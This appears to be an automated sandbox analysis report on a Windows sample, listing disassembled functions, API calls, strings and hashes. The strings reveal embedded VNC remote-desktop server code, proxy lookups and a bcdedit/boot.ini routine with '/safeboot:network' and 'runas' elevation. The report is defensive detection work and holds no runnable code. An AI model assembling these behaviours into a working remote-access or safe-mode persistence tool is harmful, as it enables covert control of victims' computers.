GetEnvironmentVariableA.KERNEL32 ref: 00007FF7D5943265
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D59432B7
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D59432FF
SetFileAttributesA.KERNEL32 ref: 00007FF7D5943361
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D594337D
GetLastError.KERNEL32 ref: 00007FF7D5943383
GetEnvironmentVariableA.KERNEL32 ref: 00007FF7D59433A1
GetForegroundWindow.USER32 ref: 00007FF7D5943445
ShellExecuteExA.SHELL32 ref: 00007FF7D594347F

Strings

\system32\, xrefs: 00007FF7D59433E1
SYSTEMDRIVE, xrefs: 00007FF7D594325E
/safeboot:network, xrefs: 00007FF7D5943332
SystemRoot, xrefs: 00007FF7D5943392
twork, xrefs: 00007FF7D594342B
operating systems, xrefs: 00007FF7D59432F0, 00007FF7D5943376
boot loader, xrefs: 00007FF7D594329B
default, xrefs: 00007FF7D5943289
bcdedit.exe, xrefs: 00007FF7D5943417
runas, xrefs: 00007FF7D5943453
/boot.ini, xrefs: 00007FF7D5943282

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfileString$EnvironmentVariable$AttributesErrorExecuteFileForegroundLastShellVersionWindowWrite
String ID: /safeboot:network$/boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$operating systems$runas$twork
API String ID: 3746257916-1709497384
Opcode ID: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
Instruction ID: 402f24a639b8effdb2746f928281c7f5c87649bcfb708b414a34dd318a73aa1f
Opcode Fuzzy Hash: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
Instruction Fuzzy Hash: BD715B25A14A969AE7149F74E840AED7BA0FF48768FC01337EA6D136E8DF38D115C320

Function 00007FF7D593B550 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593B030: _wgetenv.LIBCMT ref: 00007FF7D593B05E
Part of subcall function 00007FF7D593B030: _wgetenv.LIBCMT ref: 00007FF7D593B08C
Part of subcall function 00007FF7D593B030: _wgetenv.LIBCMT ref: 00007FF7D593B0DC
Part of subcall function 00007FF7D593B030: inet_ntoa.WS2_32 ref: 00007FF7D593B1C8

inet_ntoa.WS2_32 ref: 00007FF7D593B5B8
free.LIBCMT ref: 00007FF7D593B5D4
_wgetenv.LIBCMT ref: 00007FF7D593B682
free.LIBCMT ref: 00007FF7D593B5CC

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

inet_ntoa.WS2_32 ref: 00007FF7D593B59C

Part of subcall function 00007FF7D59E92A4: malloc.LIBCMT ref: 00007FF7D59E92C7

_wgetenv.LIBCMT ref: 00007FF7D593B60D
_wgetenv.LIBCMT ref: 00007FF7D593B665
_wgetenv.LIBCMT ref: 00007FF7D593B6B0
_wgetenv.LIBCMT ref: 00007FF7D593B701
_wgetenv.LIBCMT ref: 00007FF7D593B738
_wgetenv.LIBCMT ref: 00007FF7D593B766
free.LIBCMT ref: 00007FF7D593B893

Strings

SOCKS5_SERVER, xrefs: 00007FF7D593B65E, 00007FF7D593B672
http://, xrefs: 00007FF7D593B7BE
SOCKS_SERVER, xrefs: 00007FF7D593B6A9, 00007FF7D593B6BD
SOCKS_RESOLVE, xrefs: 00007FF7D593B75F, 00007FF7D593B773
SOCKS4_RESOLVE, xrefs: 00007FF7D593B731, 00007FF7D593B745
SOCKS4_SERVER, xrefs: 00007FF7D593B67B, 00007FF7D593B68F
SOCKS5_RESOLVE, xrefs: 00007FF7D593B6FA, 00007FF7D593B70E
HTTP_PROXY, xrefs: 00007FF7D593B606, 00007FF7D593B61A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
API String ID: 3609861302-2295524587
Opcode ID: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
Instruction ID: 7c502cc8c0fd6b26331ddc221b9e1f14812165ea1cb6cb9ae8265dbe620f53a1
Opcode Fuzzy Hash: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
Instruction Fuzzy Hash: 2FA16061A0968287FE65BB2594502BDA691EF64F88FC80437DE5D47796EF3CE901C320

Function 00007FF7D595F040 Relevance: 35.2, APIs: 5, Strings: 15, Instructions: 207threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D599A5B0: GetCurrentThreadId.KERNEL32 ref: 00007FF7D599A5E1
Part of subcall function 00007FF7D599A5B0: GetThreadDesktop.USER32 ref: 00007FF7D599A5E9
Part of subcall function 00007FF7D599A5B0: OpenInputDesktop.USER32 ref: 00007FF7D599A5FC

GetCurrentThreadId.KERNEL32 ref: 00007FF7D595F15A
GetThreadDesktop.USER32 ref: 00007FF7D595F162
GetUserObjectInformationA.USER32 ref: 00007FF7D595F185

Part of subcall function 00007FF7D599A4A0: OpenDesktopA.USER32 ref: 00007FF7D599A4ED

DeleteObject.GDI32 ref: 00007FF7D595F2F7
InvalidateRect.USER32 ref: 00007FF7D595F330

Strings

vncdesktop.cpp : SetPalette Failed, xrefs: 00007FF7D595F3A1
vncdesktop.cpp : ThunkBitmapInfo Failed, xrefs: 00007FF7D595F25A
vncdesktop.cpp : InitBitmap Failed, xrefs: 00007FF7D595F242
vncdesktop.cpp : InitDesktop..., xrefs: 00007FF7D595F06D
vncdesktop.cpp : SetPixShift Failed, xrefs: 00007FF7D595F378
vncdesktop.cpp : Driver option disabled , xrefs: 00007FF7D595F1E8
vncdesktop.cpp : InitVideo driver Called, xrefs: 00007FF7D595F0C0
vncdesktop.cpp : InitDesktop Failed, xrefs: 00007FF7D595F0A0
vncdesktop.cpp : Removing real Dib buffer and replace by driver communication buffer, xrefs: 00007FF7D595F2D3
vncdesktop.cpp : Driver option enabled , xrefs: 00007FF7D595F14E
vncdesktop.cpp : no default desktop , xrefs: 00007FF7D595F1C4
vncdesktop.cpp : SetPixFormat Failed, xrefs: 00007FF7D595F34D
vncdesktop.cpp : Break log, xrefs: 00007FF7D595F21C
Default, xrefs: 00007FF7D595F197
vncdesktop.cpp : EnableOptimisedBlits Failed, xrefs: 00007FF7D595F2AD

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: DesktopThread$CurrentObjectOpen$DeleteInformationInputInvalidateRectUser
String ID: Default$vncdesktop.cpp : Break log$vncdesktop.cpp : Driver option disabled $vncdesktop.cpp : Driver option enabled $vncdesktop.cpp : EnableOptimisedBlits Failed$vncdesktop.cpp : InitBitmap Failed$vncdesktop.cpp : InitDesktop Failed$vncdesktop.cpp : InitDesktop...$vncdesktop.cpp : InitVideo driver Called$vncdesktop.cpp : Removing real Dib buffer and replace by driver communication buffer$vncdesktop.cpp : SetPalette Failed$vncdesktop.cpp : SetPixFormat Failed$vncdesktop.cpp : SetPixShift Failed$vncdesktop.cpp : ThunkBitmapInfo Failed$vncdesktop.cpp : no default desktop
API String ID: 421987145-2663527212
Opcode ID: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
Instruction ID: d5b29faed7e4669cf76e3216a9d35c99f505f8a3cff065dc3eae27e9ffe92f8f
Opcode Fuzzy Hash: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
Instruction Fuzzy Hash: E1A117B1A0869782FA14BB64D4406BDA760EF84F58FD84033DD4E8B699DF3CE549C760

Function 00007FF7D59437E0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 127COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF7D5943813
GetEnvironmentVariableA.KERNEL32 ref: 00007FF7D5943835
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D5943887
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D59438CF
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D5943921
SetFileAttributesA.KERNEL32 ref: 00007FF7D5943930
GetEnvironmentVariableA.KERNEL32 ref: 00007FF7D594394E
GetForegroundWindow.USER32 ref: 00007FF7D59439F5
ShellExecuteExA.SHELL32 ref: 00007FF7D5943A2F

Strings

\system32\, xrefs: 00007FF7D5943991
SYSTEMDRIVE, xrefs: 00007FF7D594382E
SystemRoot, xrefs: 00007FF7D594393F
operating systems, xrefs: 00007FF7D59438C0, 00007FF7D5943917
boot loader, xrefs: 00007FF7D594386B
default, xrefs: 00007FF7D5943859
bcdedit.exe, xrefs: 00007FF7D59439C7
eboot, xrefs: 00007FF7D59439DB
runas, xrefs: 00007FF7D5943A03
/boot.ini, xrefs: 00007FF7D5943852

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfileString$EnvironmentVariable$AttributesExecuteFileForegroundShellVersionWindowWrite
String ID: /boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$eboot$operating systems$runas
API String ID: 3443580464-3826360582
Opcode ID: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
Instruction ID: fc457cc76969bf1641f3a660c854d6f3c377c13851dffbb7483457a4514b53fe
Opcode Fuzzy Hash: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
Instruction Fuzzy Hash: BE617E31A18A969AE7149F74E840AED77A0FB48768FC01237EA6D576D8DF38D105C360

Function 00007FF7D593CF80 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 254libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D593CFD1
GetProcAddress.KERNEL32 ref: 00007FF7D593CFE9
FreeLibrary.KERNEL32 ref: 00007FF7D593D00C
GlobalFree.KERNEL32 ref: 00007FF7D593D01C
GlobalFree.KERNEL32 ref: 00007FF7D593D02C
WideCharToMultiByte.KERNEL32 ref: 00007FF7D593D06A
GlobalFree.KERNEL32 ref: 00007FF7D593D075
swscanf.LIBCMT ref: 00007FF7D593D263
swscanf.LIBCMT ref: 00007FF7D593D2F7
swscanf.LIBCMT ref: 00007FF7D593D307

Strings

http=, xrefs: 00007FF7D593D0B2, 00007FF7D593D176
P, xrefs: 00007FF7D593D221
https=, xrefs: 00007FF7D593D0EE, 00007FF7D593D1AE
443, xrefs: 00007FF7D593D328, 00007FF7D593D33B
WinHttpGetIEProxyConfigForCurrentUser, xrefs: 00007FF7D593CFDF
winhttp.dll, xrefs: 00007FF7D593CFC8

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Free$Globalswscanf$Library$AddressByteCharLoadMultiProcWide
String ID: 443$P$WinHttpGetIEProxyConfigForCurrentUser$http=$https=$winhttp.dll
API String ID: 3955186772-955988753
Opcode ID: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
Instruction ID: 9b0296c7b45581da72c439f850f2d214fec7676eb8cffe80fb5e58dc5912dc15
Opcode Fuzzy Hash: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
Instruction Fuzzy Hash: 18B1BC21A1DB8287FA15AB64D5502BDA7A0EF85BC8FD44136EE5D03AC9DF3DE506C320

Function 00007FF7D59500F0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 123COMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 00007FF7D595014B
getpeername.WS2_32 ref: 00007FF7D5950191
free.LIBCMT ref: 00007FF7D59501E2
free.LIBCMT ref: 00007FF7D59501DA

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

inet_ntoa.WS2_32 ref: 00007FF7D595019B

Part of subcall function 00007FF7D59E9700: _errno.LIBCMT ref: 00007FF7D59E9712
Part of subcall function 00007FF7D59E9700: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E971D

inet_ntoa.WS2_32 ref: 00007FF7D5950155

Part of subcall function 00007FF7D59E92A4: malloc.LIBCMT ref: 00007FF7D59E92C7

getsockname.WS2_32 ref: 00007FF7D595022C
inet_ntoa.WS2_32 ref: 00007FF7D5950236
getpeername.WS2_32 ref: 00007FF7D5950272
inet_ntoa.WS2_32 ref: 00007FF7D595027C
free.LIBCMT ref: 00007FF7D59502B3
free.LIBCMT ref: 00007FF7D59502BB

Strings

vncclient.cpp : loopback connection attempted - client accepted, xrefs: 00007FF7D59502C4
vncclient.cpp : loopback connection attempted - client rejected, xrefs: 00007FF7D59501EF
<unavailable>, xrefs: 00007FF7D595015B, 00007FF7D595023C
Local loop-back connections are disabled., xrefs: 00007FF7D5950204

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: freeinet_ntoa$_errnogetpeernamegetsockname$ErrorFreeHeapLast_invalid_parameter_noinfomalloc
String ID: <unavailable>$Local loop-back connections are disabled.$vncclient.cpp : loopback connection attempted - client accepted$vncclient.cpp : loopback connection attempted - client rejected
API String ID: 3199031719-36275550
Opcode ID: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
Instruction ID: bba0b4e725bc536349e9750caad70159ba04aebbce1785c33116b1924238407c
Opcode Fuzzy Hash: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
Instruction Fuzzy Hash: 73514D21A096428BEA58EB65E5442BDA7A0FF88F89FC44036DE4E47769DF3CE105C720

Function 00007FF7D599A5B0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 117threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7D599A5E1
GetThreadDesktop.USER32 ref: 00007FF7D599A5E9
OpenInputDesktop.USER32 ref: 00007FF7D599A5FC
GetLastError.KERNEL32 ref: 00007FF7D599A61A
GetUserObjectInformationA.USER32 ref: 00007FF7D599A68D
CloseDesktop.USER32 ref: 00007FF7D599A69A

Strings

vncservice.cpp : !GetUserObjectInformation(inputdesktop, xrefs: 00007FF7D599A724
vncservice.cpp : OpenInputDesktop %i I, xrefs: 00007FF7D599A620
vncservice.cpp : !GetUserObjectInformation(threaddesktop, xrefs: 00007FF7D599A6B9
vncservice.cpp : threadname, inputname differ, xrefs: 00007FF7D599A777
vncservice.cpp : failed to close input desktop, xrefs: 00007FF7D599A6A4, 00007FF7D599A70F, 00007FF7D599A737
vncservice.cpp : OpenInputDesktop II, xrefs: 00007FF7D599A652

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCurrentErrorInformationInputLastObjectOpenUser
String ID: vncservice.cpp : !GetUserObjectInformation(inputdesktop$vncservice.cpp : !GetUserObjectInformation(threaddesktop$vncservice.cpp : OpenInputDesktop %i I$vncservice.cpp : OpenInputDesktop II$vncservice.cpp : failed to close input desktop$vncservice.cpp : threadname, inputname differ
API String ID: 55935355-432259686
Opcode ID: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
Instruction ID: 6a648d9135bcb90b5ad84f5f8444e423fed640fb29982642e0a32d5854a125ea
Opcode Fuzzy Hash: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
Instruction Fuzzy Hash: 3E517F25E1869383FB18BB65A8455BDABA5EF84F88FC45033DD4E92264DF3CE105CB60

Function 00007FF7D5963260 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 89threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7D5963282
GetThreadDesktop.USER32 ref: 00007FF7D596328A
GetUserObjectInformationA.USER32 ref: 00007FF7D59632CF
ResetEvent.KERNEL32 ref: 00007FF7D5963333
CreateThread.KERNEL32 ref: 00007FF7D5963359
WaitForSingleObject.KERNEL32 ref: 00007FF7D5963372
TerminateThread.KERNEL32 ref: 00007FF7D59633A3
CloseHandle.KERNEL32 ref: 00007FF7D59633B0

Strings

vncdesktopsink.cpp : ERROR: initwindowthread failed to start , xrefs: 00007FF7D5963389
vncdesktopsink.cpp : StartInitWindowthread default desk, xrefs: 00007FF7D5963312
vncdesktopsink.cpp : StartInitWindowthread no default desk, xrefs: 00007FF7D5963403
vncdesktopsink.cpp : StartInitWindowthread started, xrefs: 00007FF7D59633CD
vncdesktopsink.cpp : StartInitWindowthread reactivate, xrefs: 00007FF7D59633E2
Default, xrefs: 00007FF7D59632E5
vncdesktopsink.cpp : StartInitWindowthread , xrefs: 00007FF7D5963290

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Thread$Object$CloseCreateCurrentDesktopEventHandleInformationResetSingleTerminateUserWait
String ID: Default$vncdesktopsink.cpp : ERROR: initwindowthread failed to start $vncdesktopsink.cpp : StartInitWindowthread $vncdesktopsink.cpp : StartInitWindowthread default desk$vncdesktopsink.cpp : StartInitWindowthread no default desk$vncdesktopsink.cpp : StartInitWindowthread reactivate$vncdesktopsink.cpp : StartInitWindowthread started
API String ID: 3943905059-2958163836
Opcode ID: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
Instruction ID: 8bc2b9761cc018008d0d1d64754f48a0a4c71ebdd09cccec9d1ff5b9be4c42b5
Opcode Fuzzy Hash: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
Instruction Fuzzy Hash: EC413B21A1869697E714AB64E804AFDAB65FF84F88FC84133DD4D572A8DF3CD149C360

Function 00007FF7D596BF40 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202windowCOMMON

Download Yara Rule

APIs

GetIconInfo.USER32 ref: 00007FF7D596BF9D
DeleteObject.GDI32 ref: 00007FF7D596BFF6

Strings

vncencoderCursor.cpp : GetBitmapBits() failed., xrefs: 00007FF7D596C0AF
vncencoderCursor.cpp : incorrect data in cursor bitmap., xrefs: 00007FF7D596C262
vncencoderCursor.cpp : cursor bitmap handle is NULL., xrefs: 00007FF7D596C008
vncencoderCursor.cpp : cursor handle is NULL., xrefs: 00007FF7D596BF8D
vncencoderCursor.cpp : GetIconInfo() failed., xrefs: 00007FF7D596BFA7
vncencoderCursor.cpp : vncDesktop::GetRichCursorData() failed., xrefs: 00007FF7D596C1DA
vncencoderCursor.cpp : GetObject() for bitmap failed., xrefs: 00007FF7D596C035

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

